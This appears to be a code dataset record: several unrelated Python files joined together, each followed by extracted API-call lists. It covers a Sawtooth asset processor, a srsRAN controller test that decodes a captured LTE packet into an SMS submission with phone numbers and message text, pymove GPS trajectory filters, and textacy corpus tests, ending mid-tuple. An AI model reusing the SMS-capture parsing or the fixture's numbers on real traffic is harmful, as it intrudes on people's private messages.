"protobuf.asset_pb2.Asset",
"protobuf.asset_pb2.AssetCandidate.VoteRecord",
"modules.... | [((1219, 1246), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1236, 1246), False, 'import logging\n'), ((10687, 10697), 'protobuf.setting_pb2.Settings', 'Settings', ([], {}), '()\n', (10695, 10697), False, 'from protobuf.setting_pb2 import Settings\n'), ((10932, 10949), 'protobuf.asset_pb2.AssetCandidates', 'AssetCandidates', ([], {}), '()\n', (10947, 10949), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((1435, 1460), 'modules.address.Address.asset_addresser', 'Address.asset_addresser', ([], {}), '()\n', (1458, 1460), False, 'from modules.address import Address\n'), ((2361, 2375), 'protobuf.asset_pb2.AssetPayload', 'AssetPayload', ([], {}), '()\n', (2373, 2375), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((3958, 3973), 'protobuf.asset_pb2.AssetProposal', 'AssetProposal', ([], {}), '()\n', (3971, 3973), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((4044, 4051), 'protobuf.asset_pb2.Asset', 'Asset', ([], {}), '()\n', (4049, 4051), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((5325, 5336), 'protobuf.asset_pb2.AssetVote', 'AssetVote', ([], {}), '()\n', (5334, 5336), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((6856, 6867), 'protobuf.asset_pb2.AssetVote', 'AssetVote', ([], {}), '()\n', (6865, 6867), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((8223, 8230), 'protobuf.asset_pb2.Asset', 'Asset', ([], {}), '()\n', (8228, 8230), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((2738, 2745), 'protobuf.asset_pb2.Asset', 'Asset', ([], {}), '()\n', (2743, 2745), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((4688, 4785), 'protobuf.asset_pb2.AssetCandidate.VoteRecord', 'AssetCandidate.VoteRecord', ([], {'public_key': 'public_key', 'vote': 'AssetCandidate.VoteRecord.VOTE_ACCEPT'}), '(public_key=public_key, vote=AssetCandidate.\n VoteRecord.VOTE_ACCEPT)\n', (4713, 4785), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n'), ((10017, 10078), 'sawtooth_sdk.processor.exceptions.InvalidTransaction', 'InvalidTransaction', (['"""Asset auth_list settings does not exist"""'], {}), "('Asset auth_list settings does not exist')\n", (10035, 10078), False, 'from sawtooth_sdk.processor.exceptions import InvalidTransaction\n'), ((10480, 10542), 'sawtooth_sdk.processor.exceptions.InvalidTransaction', 'InvalidTransaction', (['"""Asset threshold settings does not exist."""'], {}), "('Asset threshold settings does not exist.')\n", (10498, 10542), False, 'from sawtooth_sdk.processor.exceptions import InvalidTransaction\n'), ((2951, 2958), 'protobuf.asset_pb2.Asset', 'Asset', ([], {}), '()\n', (2956, 2958), False, 'from protobuf.asset_pb2 import Asset, AssetPayload, AssetProposal, AssetVote, AssetCandidate, AssetCandidates\n')] |
import datetime
from pyshark import FileCapture
from srsran_controller.uu_events.factory import EventsFactory
from srsran_controller.uu_events.gsm_sms_submit import GSM_SMS_SUBMIT_NAME
GSM_SMS_SUBMIT_PCAP_DATA = (
'0a0d0d0ab80000004d3c2b1a01000000ffffffffffffffff02003500496e74656c28522920436f726528544d292069372d37373030204350'
'55204020332e363047487a20287769746820535345342e3229000000030017004c696e757820352e31312e302d32352d67656e6572696300'
'04003a0044756d70636170202857697265736861726b2920332e322e3320284769742076332e322e33207061636b6167656420617320332e'
'322e332d3129000000000000b80000000100000060000000010000000000040002000b006c74652d6e6574776f726b000900010009000000'
'0b000e000075647020706f7274203538343700000c0017004c696e757820352e31312e302d32352d67656e65726963000000000060000000'
'060000007c0200000000000042c0a016b6cea54859020000590200000242c3b919f70242c0a8340208004500024bb4b7400040119999c0a8'
'3402c0a834fe163716d70237ec996d61632d6c746501000302004a0300000433d007010a000f00013d3a223523461f8000a00000480564e0'
'e28e80e040ec644d2023e0038000d02a7081200ce28021e1922f2a468902acc00000f886f91f8fd26020552504870043806b45000042cb32'
'00004011f356ac10000208080808ef7f0035002e7efdd987010000010000000000000a696e69742d7030316d64056170706c6503636f6d00'
'0041000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'
'000000000000000000000000000000007c020000050000006c00000000000000f1ca05008b4328be01001c00436f756e746572732070726f'
'76696465642062792064756d7063617002000800f1ca0500f83dc6b103000800f1ca0500ef4228be04000800b30000000000000005000800'
'0000000000000000000000006c000000'
)
def test_parsing_gsm_sms_submit(tmp_path):
p = tmp_path / 'gsm_sms_submit.pcap'
p.write_bytes(bytes.fromhex(GSM_SMS_SUBMIT_PCAP_DATA))
with FileCapture(str(p)) as pcap:
submit = list(EventsFactory().from_packet(list(pcap)[0]))[0]
assert submit == {
'event': GSM_SMS_SUBMIT_NAME,
'data': {
'rp_da': '3548900076',
'content': 'Do food',
'tp_da': '972543845166',
},
'rnti': 74,
'time': datetime.datetime(2021, 9, 1, 19, 40, 56, 27320),
}
| [
"datetime.datetime",
"srsran_controller.uu_events.factory.EventsFactory"
] | [((2884, 2932), 'datetime.datetime', 'datetime.datetime', (['(2021)', '(9)', '(1)', '(19)', '(40)', '(56)', '(27320)'], {}), '(2021, 9, 1, 19, 40, 56, 27320)\n', (2901, 2932), False, 'import datetime\n'), ((2605, 2620), 'srsran_controller.uu_events.factory.EventsFactory', 'EventsFactory', ([], {}), '()\n', (2618, 2620), False, 'from srsran_controller.uu_events.factory import EventsFactory\n')] |
"""
Semantic operations.
outliers
create_or_update_out_of_the_bbox,
create_or_update_gps_deactivated_signal,
create_or_update_gps_jump,
create_or_update_short_trajectory,
create_or_update_gps_block_signal,
filter_block_signal_by_repeated_amount_of_points,
filter_block_signal_by_time,
filter_longer_time_to_stop_segment_by_id
"""
from __future__ import annotations
from typing import TYPE_CHECKING
import numpy as np
from pandas import DataFrame
from pymove.preprocessing import filters, segmentation, stay_point_detection
from pymove.utils.constants import (
BLOCK,
DEACTIVATED,
DIST_PREV_TO_NEXT,
DIST_TO_NEXT,
DIST_TO_PREV,
JUMP,
OUT_BBOX,
OUTLIER,
SEGMENT_STOP,
SHORT,
TID_PART,
TIME_TO_PREV,
TRAJ_ID,
)
from pymove.utils.log import logger, timer_decorator
if TYPE_CHECKING:
from pymove.core.dask import DaskMoveDataFrame
from pymove.core.pandas import PandasMoveDataFrame
def _end_create_operation(
move_data: DataFrame, new_label: str, inplace: bool
) -> DataFrame | None:
"""
Returns the dataframe after create operation.
Parameters
----------
move_data: dataframe
The input trajectories data.
new_label: string
The name of the new feature with detected deactivated signals.
inplace : boolean
if set to true the original dataframe will be altered to contain
the result of the filtering, otherwise a copy will be returned.
Returns
-------
DataFrame
DataFrame with the additional features or None
"""
logger.debug(move_data[new_label].value_counts())
if not inplace:
return move_data
def _process_simple_filter(
move_data: DataFrame, new_label: str, feature: str, value: float, inplace: bool
) -> DataFrame | None:
"""
Processes create operation with simple filter.
Parameters
----------
move_data: dataframe
The input trajectories data.
new_label: string
The name of the new feature with detected deactivated signals.
feature: string
Feature column to compare
value: float
Value to compare feature
inplace : boolean
if set to true the original dataframe will be altered to contain
the result of the filtering, otherwise a copy will be returned.
Returns
-------
DataFrame
DataFrame with the additional features or None
"""
move_data[new_label] = False
filter_ = move_data[feature] >= value
idx_start = move_data[filter_].index
idx_end = idx_start - np.full(len(idx_start), 1, dtype=np.int32)
idx = np.concatenate([idx_start, idx_end], axis=0)
move_data.at[idx, new_label] = True
return _end_create_operation(
move_data, new_label, inplace
)
@timer_decorator
def outliers(
move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
jump_coefficient: float = 3.0,
threshold: float = 1,
new_label: str = OUTLIER,
inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
"""
Create or update a boolean feature to detect outliers.
Parameters
----------
move_data : dataframe
The input trajectory data
jump_coefficient : float, optional
by default 3
threshold : float, optional
Minimum value that the distance features must have
in order to be considered outliers, by default 1
new_label: string, optional
The name of the new feature with detected points out of the bbox,
by default OUTLIER
inplace : bool, optional
if set to true the original dataframe will be altered to contain
the result of the filtering, otherwise a copy will be returned, by default False
Returns
-------
DataFrame
Returns a dataframe with the trajectories outliers or None
"""
if not inplace:
move_data = move_data.copy()
if DIST_TO_PREV not in move_data:
move_data.generate_dist_features()
if move_data.index.name is not None:
logger.debug('...Reset index for filtering\n')
move_data.reset_index(inplace=True)
if (
DIST_TO_PREV in move_data
and DIST_TO_NEXT
and DIST_PREV_TO_NEXT in move_data
):
jump = jump_coefficient * move_data[DIST_PREV_TO_NEXT]
filter_ = (
(move_data[DIST_TO_NEXT] > threshold)
& (move_data[DIST_TO_PREV] > threshold)
& (move_data[DIST_PREV_TO_NEXT] > threshold)
& (jump < move_data[DIST_TO_NEXT])
& (jump < move_data[DIST_TO_PREV])
)
move_data[new_label] = filter_
else:
logger.warning('...Distances features were not created')
if not inplace:
return move_data
@timer_decorator
def create_or_update_out_of_the_bbox(
move_data: DataFrame,
bbox: tuple[int, int, int, int],
new_label: str = OUT_BBOX,
inplace: bool = False
) -> DataFrame | None:
"""
Create or update a boolean feature to detect points out of the bbox.
Parameters
----------
move_data: dataframe
The input trajectories data.
bbox : tuple
Tuple of 4 elements, containing the minimum and maximum values
of latitude and longitude of the bounding box.
new_label: string, optional
The name of the new feature with detected points out of the bbox,
by default OUT_BBOX
inplace : boolean, optional
if set to true the original dataframe will be altered to contain
the result of the filtering, otherwise a copy will be returned,
by default False
Returns
-------
DataFrame
Returns dataframe with a boolean feature with detected
points out of the bbox, or None
Raises
------
ValueError
If feature generation fails
"""
if not inplace:
move_data = move_data.copy()
logger.debug('\nCreate or update boolean feature to detect points out of the bbox')
filtered_ = filters.by_bbox(move_data, bbox, filter_out=True)
if filtered_ is None:
raise ValueError('Filter bbox failed!')
logger.debug('...Creating a new label named as %s' % new_label)
move_data[new_label] = False
if filtered_.shape[0] > 0:
logger.debug('...Setting % as True\n' % new_label)
move_data.at[filtered_.index, new_label] = True
return _end_create_operation(
move_data, new_label, inplace
)
@timer_decorator
def create_or_update_gps_deactivated_signal(
move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
max_time_between_adj_points: float = 7200,
new_label: str = DEACTIVATED,
inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
"""
Creates a new feature that inform if point invalid.
If the max time between adjacent points is equal or
less than max_time_between_adj_points.
Parameters
----------
move_data: dataframe
The input trajectories data.
max_time_between_adj_points: float, optional
The max time between adjacent points, by default 7200
new_label: string, optional
The name of the new feature with detected deactivated signals,
by default DEACTIVATED
inplace : boolean, optional
if set to true the original dataframe will be altered to contain
the result of the filtering, otherwise a copy will be returned,
by default False
Returns
-------
DataFrame
DataFrame with the additional features or None
'time_to_prev', 'time_to_next', 'time_prev_to_next', 'deactivate_signal'
"""
if not inplace:
move_data = move_data.copy()
message = 'Create or update deactivated signal if time max > %s seconds\n'
logger.debug(message % max_time_between_adj_points)
move_data.generate_time_features()
return _process_simple_filter(
move_data,
new_label,
TIME_TO_PREV,
max_time_between_adj_points,
inplace
)
@timer_decorator
def create_or_update_gps_jump(
move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
max_dist_between_adj_points: float = 3000,
new_label: str = JUMP,
inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
"""
Creates a new feature that inform if point is a gps jump.
A jump is defined if the maximum distance between adjacent points
is greater than max_dist_between_adj_points.
Parameters
----------
move_data: dataframe
The input trajectories data.
max_dist_between_adj_points: float, optional
The maximum distance between adjacent points, by default 3000
new_label: string, optional
The name of the new feature with detected deactivated signals, by default GPS_JUMP
inplace : boolean, optional
if set to true the original dataframe will be altered to contain
the result of the filtering, otherwise a copy will be returned,
by default False
Returns
-------
DataFrame
DataFrame with the additional features or None
'dist_to_prev', 'dist_to_next', 'dist_prev_to_next', 'jump'
"""
if not inplace:
move_data = move_data.copy()
message = 'Create or update jump if dist max > %s meters\n'
logger.debug(message % max_dist_between_adj_points)
move_data.generate_dist_features()
return _process_simple_filter(
move_data,
new_label,
DIST_TO_PREV,
max_dist_between_adj_points,
inplace
)
@timer_decorator
def create_or_update_short_trajectory(
move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
max_dist_between_adj_points: float = 3000,
max_time_between_adj_points: float = 7200,
max_speed_between_adj_points: float = 50,
k_segment_max: int = 50,
label_tid: str = TID_PART,
new_label: str = SHORT,
inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
"""
Creates a new feature that inform if point belongs to a short trajectory.
Parameters
----------
move_data : dataframe
The input trajectory data
max_dist_between_adj_points : float, optional
Specify the maximum distance a point should have from
the previous point, in order not to be dropped, by default 3000
max_time_between_adj_points : float, optional
Specify the maximum travel time between two adjacent points, by default 7200
max_speed_between_adj_points : float, optional
Specify the maximum speed of travel between two adjacent points, by default 50
k_segment_max: int, optional
Specify the maximum number of segments in the trajectory, by default 50
label_tid: str, optional
The label of the column containing the ids of the formed segments,
by default TID_PART
new_label: str, optional
The name of the new feature with short trajectories, by default SHORT
inplace : boolean, optional
if set to true the original dataframe will be altered to contain
the result of the filtering, otherwise a copy will be returned,
by default False
Returns
-------
DataFrame
DataFrame with the aditional features or None
'dist_to_prev', 'time_to_prev', 'speed_to_prev', 'tid_part', 'short_traj'
"""
if not inplace:
move_data = move_data.copy()
logger.debug('\nCreate or update short trajectories...')
segmentation.by_dist_time_speed(
move_data,
max_dist_between_adj_points=max_dist_between_adj_points,
max_time_between_adj_points=max_time_between_adj_points,
max_speed_between_adj_points=max_speed_between_adj_points,
label_new_tid=label_tid,
inplace=True
)
move_data[new_label] = False
df_count_tid = move_data.groupby(by=label_tid).size()
filter_ = df_count_tid <= k_segment_max
idx = df_count_tid[filter_].index
move_data.loc[move_data[label_tid].isin(idx), new_label] = True
return _end_create_operation(
move_data, new_label, inplace
)
@timer_decorator
def create_or_update_gps_block_signal(
move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
max_time_stop: float = 7200,
new_label: str = BLOCK,
label_tid: str = TID_PART,
inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
"""
Creates a new feature that inform segments with periods without moving.
Parameters
----------
move_data: dataFrame
The input trajectories data.
max_time_stop: float, optional
Maximum time allowed with speed 0, by default 7200
new_label: string, optional
The name of the new feature with detected deactivated signals, by default BLOCK
label_tid : str, optional
The label of the column containing the ids of the formed segments,
by default TID_PART
Is the new slitted id.
inplace : boolean, optional
if set to true the original dataframe will be altered to contain
the result of the filtering, otherwise a copy will be returned,
by default False
Returns
-------
DataFrame
DataFrame with the additional features or None
'dist_to_prev', 'time_to_prev', 'speed_to_prev',
'tid_dist', 'block_signal'
"""
if not inplace:
move_data = move_data.copy()
message = 'Create or update block_signal if max time stop > %s seconds\n'
logger.debug(message % max_time_stop)
segmentation.by_max_dist(
move_data,
max_dist_between_adj_points=0.0,
label_new_tid=label_tid,
inplace=True
)
logger.debug('Updating dist time speed values')
move_data.generate_dist_time_speed_features(label_id=label_tid)
move_data[new_label] = False
df_agg_tid = move_data.groupby(by=label_tid).agg({TIME_TO_PREV: 'sum'})
filter_ = df_agg_tid[TIME_TO_PREV] >= max_time_stop
idx = df_agg_tid[filter_].index
move_data.loc[move_data[label_tid].isin(idx), new_label] = True
return _end_create_operation(
move_data, new_label, inplace
)
@timer_decorator
def filter_block_signal_by_repeated_amount_of_points(
move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
amount_max_of_points_stop: float = 30.0,
max_time_stop: float = 7200,
filter_out: bool = False,
label_tid: str = TID_PART,
inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
"""
Filters from dataframe points with blocked signal by amount of points.
Parameters
----------
move_data: dataFrame
The input trajectories data.
amount_max_of_points_stop: float, optional
Maximum number of stopped points, by default 30
max_time_stop: float, optional
Maximum time allowed with speed 0, by default 7200
filter_out: boolean, optional
If set to True, it will return trajectory points with blocked signal,
by default False
label_tid : str, optional
The label of the column containing the ids of the formed segments,
by default TID_PART
inplace : boolean, optional
if set to true the original dataframe will be altered to contain
the result of the filtering, otherwise a copy will be returned,
by default False
Returns
-------
DataFrame
Filtered DataFrame with the additional features or None
'dist_to_prev', 'time_to_prev', 'speed_to_prev',
'tid_dist', 'block_signal'
"""
if not inplace:
move_data = move_data.copy()
if BLOCK not in move_data:
create_or_update_gps_block_signal(
move_data, max_time_stop, label_tid=label_tid, inplace=True
)
df_count_tid = move_data.groupby(by=[label_tid]).sum()
filter_ = df_count_tid[BLOCK] > amount_max_of_points_stop
if filter_out:
idx = df_count_tid[~filter_].index
else:
idx = df_count_tid[filter_].index
filter_ = move_data[move_data[label_tid].isin(idx)].index
move_data.drop(index=filter_, inplace=True)
if not inplace:
return move_data
@timer_decorator
def filter_block_signal_by_time(
move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
max_time_stop: float = 7200,
filter_out: bool = False,
label_tid: str = TID_PART,
inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
"""
Filters from dataframe points with blocked signal by time.
Parameters
----------
move_data: dataFrame
The input trajectories data.
max_time_stop: float, optional
Maximum time allowed with speed 0, by default 7200
filter_out: boolean, optional
If set to True, it will return trajectory points with blocked signal,
by default False
label_tid : str, optional
The label of the column containing the ids of the formed segments,
by default TID_PART
inplace : boolean, optional
if set to true the original dataframe will be altered to contain
the result of the filtering, otherwise a copy will be returned,
by default False
Returns
-------
DataFrame
Filtered DataFrame with the additional features or None
'dist_to_prev', 'time_to_prev', 'speed_to_prev',
'tid_dist', 'block_signal'
"""
if not inplace:
move_data = move_data.copy()
if BLOCK not in move_data:
create_or_update_gps_block_signal(
move_data, max_time_stop, label_tid=label_tid, inplace=True
)
df_agg_tid = move_data.groupby(by=label_tid).agg(
{TIME_TO_PREV: 'sum', BLOCK: 'sum'}
)
filter_ = (df_agg_tid[TIME_TO_PREV] > max_time_stop) & (df_agg_tid[BLOCK] > 0)
if filter_out:
idx = df_agg_tid[~filter_].index
else:
idx = df_agg_tid[filter_].index
filter_ = move_data[move_data[label_tid].isin(idx)].index
move_data.drop(index=filter_, inplace=True)
if not inplace:
return move_data
@timer_decorator
def filter_longer_time_to_stop_segment_by_id(
move_data: 'PandasMoveDataFrame' | 'DaskMoveDataFrame',
dist_radius: float = 30,
time_radius: float = 900,
label_id: str = TRAJ_ID,
label_segment_stop: str = SEGMENT_STOP,
filter_out: bool = False,
inplace: bool = False
) -> 'PandasMoveDataFrame' | 'DaskMoveDataFrame' | None:
"""
Filters from dataframe segment with longest stop time.
Parameters
----------
move_data: dataFrame
The input trajectories data.
dist_radius : float, optional
The dist_radius defines the distance used in the segmentation, by default 30
time_radius : float, optional
The time_radius used to determine if a segment is a stop, by default 30
If the user stayed in the segment for a time
greater than time_radius, than the segment is a stop.
label_tid : str, optional
The label of the column containing the ids of the formed segments,
by default TRAJ_ID
label_segment_stop: str, optional
by default 'segment_stop'
filter_out: boolean, optional
If set to True, it will return trajectory points with longer time, by default True
inplace : boolean, optional
if set to true the original dataframe will be altered to contain
the result of the filtering, otherwise a copy will be returned,
by default False
Returns
-------
DataFrame
Filtered DataFrame with the additional features or None
'dist_to_prev', 'time_to_prev', 'speed_to_prev',
'tid_dist', 'block_signal'
"""
if not inplace:
move_data = move_data.copy()
if label_segment_stop not in move_data:
stay_point_detection.create_or_update_move_stop_by_dist_time(
move_data, dist_radius, time_radius, inplace=True
)
df_agg_id_stop = move_data.groupby(
[label_id, label_segment_stop], as_index=False
).agg({TIME_TO_PREV: 'sum'})
filter_ = df_agg_id_stop.groupby(
[label_id], as_index=False
).idxmax()[TIME_TO_PREV]
if filter_out:
segments = df_agg_id_stop.loc[~df_agg_id_stop.index.isin(filter_)]
else:
segments = df_agg_id_stop.loc[df_agg_id_stop.index.isin(filter_)]
segments = segments[label_segment_stop]
filter_ = move_data[move_data[label_segment_stop].isin(segments)].index
move_data.drop(index=filter_, inplace=True)
if not inplace:
return move_data
| [
"pymove.preprocessing.filters.by_bbox",
"pymove.preprocessing.stay_point_detection.create_or_update_move_stop_by_dist_time",
"pymove.utils.log.logger.debug",
"pymove.utils.log.logger.warning",
"pymove.preprocessing.segmentation.by_max_dist",
"numpy.concatenate",
"pymove.preprocessing.segmentation.by_dis... | [((2615, 2659), 'numpy.concatenate', 'np.concatenate', (['[idx_start, idx_end]'], {'axis': '(0)'}), '([idx_start, idx_end], axis=0)\n', (2629, 2659), True, 'import numpy as np\n'), ((5895, 5986), 'pymove.utils.log.logger.debug', 'logger.debug', (['"""\nCreate or update boolean feature to detect points out of the bbox"""'], {}), '(\n """\nCreate or update boolean feature to detect points out of the bbox""")\n', (5907, 5986), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((5995, 6044), 'pymove.preprocessing.filters.by_bbox', 'filters.by_bbox', (['move_data', 'bbox'], {'filter_out': '(True)'}), '(move_data, bbox, filter_out=True)\n', (6010, 6044), False, 'from pymove.preprocessing import filters, segmentation, stay_point_detection\n'), ((6125, 6188), 'pymove.utils.log.logger.debug', 'logger.debug', (["('...Creating a new label named as %s' % new_label)"], {}), "('...Creating a new label named as %s' % new_label)\n", (6137, 6188), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((7765, 7816), 'pymove.utils.log.logger.debug', 'logger.debug', (['(message % max_time_between_adj_points)'], {}), '(message % max_time_between_adj_points)\n', (7777, 7816), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((9302, 9353), 'pymove.utils.log.logger.debug', 'logger.debug', (['(message % max_dist_between_adj_points)'], {}), '(message % max_dist_between_adj_points)\n', (9314, 9353), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((11410, 11469), 'pymove.utils.log.logger.debug', 'logger.debug', (['"""\nCreate or update short trajectories..."""'], {}), '("""\nCreate or update short trajectories...""")\n', (11422, 11469), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((11472, 11741), 'pymove.preprocessing.segmentation.by_dist_time_speed', 'segmentation.by_dist_time_speed', (['move_data'], {'max_dist_between_adj_points': 'max_dist_between_adj_points', 'max_time_between_adj_points': 'max_time_between_adj_points', 'max_speed_between_adj_points': 'max_speed_between_adj_points', 'label_new_tid': 'label_tid', 'inplace': '(True)'}), '(move_data, max_dist_between_adj_points=\n max_dist_between_adj_points, max_time_between_adj_points=\n max_time_between_adj_points, max_speed_between_adj_points=\n max_speed_between_adj_points, label_new_tid=label_tid, inplace=True)\n', (11503, 11741), False, 'from pymove.preprocessing import filters, segmentation, stay_point_detection\n'), ((13487, 13524), 'pymove.utils.log.logger.debug', 'logger.debug', (['(message % max_time_stop)'], {}), '(message % max_time_stop)\n', (13499, 13524), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((13529, 13640), 'pymove.preprocessing.segmentation.by_max_dist', 'segmentation.by_max_dist', (['move_data'], {'max_dist_between_adj_points': '(0.0)', 'label_new_tid': 'label_tid', 'inplace': '(True)'}), '(move_data, max_dist_between_adj_points=0.0,\n label_new_tid=label_tid, inplace=True)\n', (13553, 13640), False, 'from pymove.preprocessing import filters, segmentation, stay_point_detection\n'), ((13680, 13727), 'pymove.utils.log.logger.debug', 'logger.debug', (['"""Updating dist time speed values"""'], {}), "('Updating dist time speed values')\n", (13692, 13727), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((4040, 4086), 'pymove.utils.log.logger.debug', 'logger.debug', (['"""...Reset index for filtering\n"""'], {}), "('...Reset index for filtering\\n')\n", (4052, 4086), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((4653, 4709), 'pymove.utils.log.logger.warning', 'logger.warning', (['"""...Distances features were not created"""'], {}), "('...Distances features were not created')\n", (4667, 4709), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((6262, 6312), 'pymove.utils.log.logger.debug', 'logger.debug', (["('...Setting % as True\\n' % new_label)"], {}), "('...Setting % as True\\n' % new_label)\n", (6274, 6312), False, 'from pymove.utils.log import logger, timer_decorator\n'), ((19774, 19889), 'pymove.preprocessing.stay_point_detection.create_or_update_move_stop_by_dist_time', 'stay_point_detection.create_or_update_move_stop_by_dist_time', (['move_data', 'dist_radius', 'time_radius'], {'inplace': '(True)'}), '(move_data,\n dist_radius, time_radius, inplace=True)\n', (19834, 19889), False, 'from pymove.preprocessing import filters, segmentation, stay_point_detection\n')] |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import pytest
from textacy import Corpus
from textacy import Doc
from textacy import cache
from textacy import compat
from textacy import io
from textacy.datasets.capitol_words import CapitolWords
DATASET = CapitolWords()
pytestmark = pytest.mark.skipif(
DATASET.filename is None,
reason='CapitolWords dataset must be downloaded before running tests')
@pytest.fixture(scope='module')
def corpus(request):
texts, metadatas = io.split_records(
DATASET.records(limit=3), 'text')
corpus = Corpus('en', texts=texts, metadatas=metadatas)
return corpus
# init tests
def test_corpus_init_lang():
assert isinstance(Corpus('en'), Corpus)
assert isinstance(Corpus(cache.load_spacy('en')), Corpus)
for bad_lang in (b'en', None):
with pytest.raises(TypeError):
Corpus(bad_lang)
def test_corpus_init_texts():
limit = 3
corpus = Corpus('en', texts=DATASET.texts(limit=limit))
assert len(corpus.docs) == limit
assert all(doc.spacy_vocab is corpus.spacy_vocab for doc in corpus)
def test_corpus_init_texts_and_metadatas():
limit = 3
texts, metadatas = io.split_records(
DATASET.records(limit=limit), 'text')
texts = list(texts)
metadatas = list(metadatas)
corpus = Corpus('en', texts=texts, metadatas=metadatas)
assert len(corpus.docs) == limit
assert all(doc.spacy_vocab is corpus.spacy_vocab for doc in corpus)
for i in range(limit):
assert texts[i] == corpus[i].text
assert metadatas[i] == corpus[i].metadata
def test_corpus_init_docs():
limit = 3
texts, metadatas = io.split_records(
DATASET.records(limit=limit), 'text')
docs = [Doc(text, lang='en', metadata=metadata)
for text, metadata in zip(texts, metadatas)]
corpus = Corpus('en', docs=docs)
assert len(corpus.docs) == limit
assert all(doc.spacy_vocab is corpus.spacy_vocab for doc in corpus)
for i in range(limit):
assert corpus[i].metadata == docs[i].metadata
corpus = Corpus(
'en', docs=docs, metadatas=({'foo': 'bar'} for _ in range(limit)))
for i in range(limit):
assert corpus[i].metadata == {'foo': 'bar'}
def test_corpus_init_no_parser():
spacy_lang = cache.load_spacy('en', disable=('parser',))
corpus = Corpus(
spacy_lang,
docs=(spacy_lang('This is a sentence in a doc.'),))
assert corpus.n_sents is None and len(corpus) == 1
# methods tests
def test_corpus_save_and_load(tmpdir, corpus):
filepath = str(tmpdir.join('test_corpus_save_and_load.pkl'))
corpus.save(filepath)
new_corpus = Corpus.load(filepath)
assert isinstance(new_corpus, Corpus)
assert len(new_corpus) == len(corpus)
assert new_corpus.lang == corpus.lang
assert new_corpus.spacy_lang.pipe_names == corpus.spacy_lang.pipe_names
assert new_corpus[0].spacy_doc.user_data['textacy'].get('spacy_lang_meta') is None
for i in range(len(new_corpus)):
assert new_corpus[i].metadata == corpus[i].metadata
| [
"textacy.Corpus",
"textacy.cache.load_spacy",
"textacy.Doc",
"textacy.Corpus.load",
"pytest.raises",
"pytest.mark.skipif",
"pytest.fixture",
"textacy.datasets.capitol_words.CapitolWords"
] | [((291, 305), 'textacy.datasets.capitol_words.CapitolWords', 'CapitolWords', ([], {}), '()\n', (303, 305), False, 'from textacy.datasets.capitol_words import CapitolWords\n'), ((320, 440), 'pytest.mark.skipif', 'pytest.mark.skipif', (['(DATASET.filename is None)'], {'reason': '"""CapitolWords dataset must be downloaded before running tests"""'}), "(DATASET.filename is None, reason=\n 'CapitolWords dataset must be downloaded before running tests')\n", (338, 440), False, 'import pytest\n'), ((448, 478), 'pytest.fixture', 'pytest.fixture', ([], {'scope': '"""module"""'}), "(scope='module')\n", (462, 478), False, 'import pytest\n'), ((596, 642), 'textacy.Corpus', 'Corpus', (['"""en"""'], {'texts': 'texts', 'metadatas': 'metadatas'}), "('en', texts=texts, metadatas=metadatas)\n", (602, 642), False, 'from textacy import Corpus\n'), ((1346, 1392), 'textacy.Corpus', 'Corpus', (['"""en"""'], {'texts': 'texts', 'metadatas': 'metadatas'}), "('en', texts=texts, metadatas=metadatas)\n", (1352, 1392), False, 'from textacy import Corpus\n'), ((1875, 1898), 'textacy.Corpus', 'Corpus', (['"""en"""'], {'docs': 'docs'}), "('en', docs=docs)\n", (1881, 1898), False, 'from textacy import Corpus\n'), ((2317, 2360), 'textacy.cache.load_spacy', 'cache.load_spacy', (['"""en"""'], {'disable': "('parser',)"}), "('en', disable=('parser',))\n", (2333, 